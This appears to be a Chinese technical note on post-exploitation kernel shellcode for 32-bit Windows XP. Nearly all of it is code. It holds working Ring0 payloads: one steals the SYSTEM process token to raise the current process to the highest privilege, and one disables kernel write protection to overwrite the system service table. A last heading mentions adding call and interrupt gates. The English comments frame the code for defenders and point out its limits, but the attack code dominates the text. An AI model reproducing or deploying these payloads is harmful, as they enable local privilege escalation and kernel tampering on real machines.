1.提权到SYSTEM
修改当前进程的token为SYSTEM进程的
token,这样就具备了系统的最高权限,可以控制整个系统。
//Ring0中执行的Shellcode
// Ring0 shellcode, variant 1: copy the SYSTEM process's token into the current process.
// C signature: NTSTATUS Ring0ShellCode(ULONG InformationClass, ULONG BufferSize,
//                                     PVOID Buffer, PULONG ReturnedLength)
// All four parameters are unused here; the signature presumably mirrors the kernel
// routine through which this code is reached -- the caller is not shown on this page.
// Globals: g_uCr0 (declared elsewhere) receives the saved CR0 value.
// Returns: always 0.
// Security note (defender view): this is the classic kernel token-theft primitive.
// It depends on a hard-coded absolute kernel address and fixed structure offsets
// (the original comment states they are for XP), so it is tied to one OS build, and
// its list walk has no termination guard. Kernel patch protection and code-integrity
// enforcement on later Windows versions target precisely this pattern
// (clearing CR0.WP followed by writes to kernel process structures), which is also
// where detection effort belongs.
NTSTATUS Ring0ShellCode(
ULONG InformationClass,
ULONG BufferSize,
PVOID Buffer,
PULONG ReturnedLength)
{
// Mask interrupts on this CPU and clear CR0.WP (bit 16, masked off by 0xFFFEFFFF)
// so that write-protected kernel pages become writable. Caveats: cli affects only the
// current processor, g_uCr0 is a single shared global, and any fault between here and
// the restore block below leaves WP cleared.
__asm
{
cli;
mov eax, cr0;
mov g_uCr0,eax;
and eax,0xFFFEFFFF;
mov cr0, eax;
}
//do something
// Walk the process list starting at the current process until the entry whose
// PID is 4 (System) is found, then copy its token field over the current process's.
// esi = current process object, kept live as the destination of the final store.
_asm
{
mov eax,0xFFDFF124
mov eax,[eax] // current thread (PTHREAD); 0xFFDFF124 is a hard-coded absolute address, XP 32-bit only
mov esi,[eax+0x220] // current process (PEPROCESS)
mov eax,esi
L:
mov eax,[eax+0x88] // follow the process list link (first pointer of the list entry at +0x88)
sub eax,0x88 // step back from the list entry to the containing process object
mov edx,[eax+0x84] // that process's PID
cmp edx,0x4 // is the PID 4, i.e. System? These offsets depend on the OS version; here XP
jne L // no termination guard: if PID 4 is never reached this loops forever
mov eax,[eax+0xc8] // System's token field (offset 0xc8, per the description above)
mov [esi+0xc8],eax // overwrite the current process's token with it
}
// Re-enable interrupts and restore the saved CR0 (re-enabling write protection).
_asm
{
sti
mov eax,g_uCr0
mov cr0,eax
}
return 0;
}
2.恢复内核Hook、Inline Hook
// Ring0 shellcode, variant 2: write the saved original entries back over the
// system service table (undo a kernel / SSDT hook).
// Same signature and unused parameters as the token-copy variant above.
// Globals (all declared elsewhere): g_uCr0 (saved CR0), g_ServiceNum (entry count),
// g_RealSSDT (its first dword is the table base -- note the double dereference below),
// g_OrgService (array of saved original entries).
// Returns: always 0.
// Security note (defender view): rewriting the service table is the same primitive
// whether it removes a rootkit's hooks or a security product's; kernel-mode code
// integrity is the control that prevents it, and unexpected CR0.WP changes are the
// observable signal.
NTSTATUS Ring0ShellCode(
ULONG InformationClass,
ULONG BufferSize,
PVOID Buffer,
PULONG ReturnedLength)
{
// Mask interrupts on this CPU and clear CR0.WP (bit 16) so the table can be written.
// cli is per-processor only; a fault before the restore block leaves WP cleared.
__asm
{
cli;
mov eax, cr0;
mov g_uCr0,eax;
and eax,0xFFFEFFFF;
mov cr0, eax;
}
//do something
ULONG i;
// For each slot i: table_base = *(ULONG*)g_RealSSDT, then the dword at
// table_base + i*4 is overwritten with g_OrgService[i].
// No bounds check: g_ServiceNum and g_OrgService must agree, and g_RealSSDT must
// still point at a valid table here -- both are the caller's responsibility.
for(i =0;i<g_ServiceNum;i++)
{
*(ULONG*)(*(ULONG*)g_RealSSDT+i*sizeof(ULONG)) = g_OrgService[i];
}
// Re-enable interrupts and restore the saved CR0 (write protection back on).
_asm
{
sti
mov eax,g_uCr0
mov cr0,eax
}
return 0;
}
3.添加调用门、中断门、任务门、陷阱门
出入R0/R3的重要手段。